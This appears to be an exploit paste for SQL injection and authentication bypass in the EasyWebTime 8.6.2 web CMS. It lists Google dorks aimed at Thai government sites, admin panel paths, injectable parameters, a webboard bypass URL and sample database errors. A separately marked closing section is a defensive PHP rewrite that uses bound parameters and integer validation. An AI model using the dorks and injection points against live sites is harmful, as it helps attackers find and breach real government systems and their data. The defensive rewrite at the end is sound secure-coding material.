KingSkrupellos

BizPotential EasyWebTime 8.6.2 SQL Injection / Bypass

Feb 13th, 2019
#############################################################

# Exploit Title : BizPotential EasyWebTime 8.6.2 SQL Injection / Bypass
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/02/2019
# Vendor Homepage : bizpotential.com ~ ewtadmin.com
# Software Information Link : bizpotential.com/overview.php
# Software Affected Version : 8.6.2 and all previous versions.
# Software Price : 100$
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
CWE-592 - Authentication Bypass Issues
# CXSecurity Reference Link : cxsecurity.com/ascii/WLB-2018090088

#############################################################

BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability

#############################################################

# Google Dorks :
*****************

inurl:''/ewtadmin/'' site:go.th

inurl:''/main.php?filename='' site:go.th

inurl:''/ewtadmin/ewt/ccs/''

intext:''© Copyright 2007 - BizPotential.com - All Rights Reserved.''

intext:''Copyright 2007 - BizPotential Co., Ltd. - All Rights Reserved''

#############################################################

# Admin Control Panel Paths :
***************************

/ewtadmin/index.php
/ewtadmin82/
/ewtcommittee/index2331.php
/ewtadmin/ewt/DOMAINNAMEHERE_intranet/ewt_login.php

#############################################################

# SQL Injection Exploit :
********************

/n_more3.php?page=[ID-NUMBER]&c_id=[SQL Injection]

/ewtadmin/ewt/[DOMAINNAME_web/n_more.php?c_id=[SQL Injection]

/more_news.php?offset=[SQL Injection]

/more_news.php?offset=-[ID-NUMBER]&cid=&startoffset=[SQL Injection]

#############################################################

# Webboard Exploit Bypass :
**************************

/ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1&filename=webboard

# Webboard Directory Path :
**************************

/ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard

/index_question.php?wcad=5&t=1&filename=webboard

ccs.DOMAINNAME.go.th/index_question.php?wcad=5&t=1&filename=webboard

#############################################################

# Example SQL Database Errors =>
********************************
SELECT * FROM article_list WHERE c_id = '199'' and n_approve = 'Y' ORDER BY n_date DESC LIMIT -20,20
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,20' at line 1

SELECT * FROM article_list WHERE ( c_id = '' ) AND n_approve = 'Y' AND (('2561-09-10 05:57:13' between n_date_start and n_date_end) or (n_date_start = '' and n_date_end = '')) ORDER BY n_date DESC,n_timestamp DESC LIMIT 60\\\',20
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\',20' at line 1

#############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#############################################################
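The error output above shows request values reaching the query text in two positions: c_id inside a quoted string, and the paging offset unquoted in LIMIT, where a backslash-escaped quote still breaks the statement. As an added example (not vendor code and not part of the original paste), this is a hardened form of the first listing query using a bound parameter for c_id and integer validation for the offset. The table and the columns c_id, n_approve and n_date come from the error messages; the function name, the n_id column, the page size and the sample rows are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not vendor code. list_articles(), n_id and the sample rows
// are hypothetical; article_list, c_id, n_approve, n_date are from the errors.
function list_articles(PDO $db, string $cId, string $rawOffset, int $pageSize = 20): array
{
    // LIMIT operands are numeric, so quoting or backslash-escaping cannot
    // protect them. Accept only a non-negative integer, else fall back to 0.
    $offset = filter_var($rawOffset, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0]]);
    if ($offset === false) {
        $offset = 0;
    }

    // c_id travels as a bound parameter and is never spliced into the SQL text.
    $stmt = $db->prepare(
        "SELECT n_id, c_id FROM article_list
          WHERE c_id = :c_id AND n_approve = 'Y'
          ORDER BY n_date DESC
          LIMIT :lim OFFSET :off"
    );
    $stmt->bindValue(':c_id', $cId, PDO::PARAM_STR);
    // PARAM_INT keeps the LIMIT operands numeric even with emulated prepares.
    $stmt->bindValue(':lim', $pageSize, PDO::PARAM_INT);
    $stmt->bindValue(':off', $offset, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database (runs offline).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE article_list
    (n_id INTEGER PRIMARY KEY, c_id TEXT, n_approve TEXT, n_date TEXT)");
$db->exec("INSERT INTO article_list (c_id, n_approve, n_date) VALUES
    ('199', 'Y', '2018-09-01'), ('199', 'N', '2018-09-02'), ('200', 'Y', '2018-09-03')");

// Inputs shaped like the values visible in the error output above.
var_dump(count(list_articles($db, '199', '0')));      // well-formed request
var_dump(count(list_articles($db, "199'", '-20')));   // stray quote, negative offset
var_dump(count(list_articles($db, '199', "60\\'")));  // escaped quote in offset
```

None of the three calls raises a database error: the malformed c_id is compared as an ordinary string, and both malformed offsets are replaced by 0 before the statement is prepared.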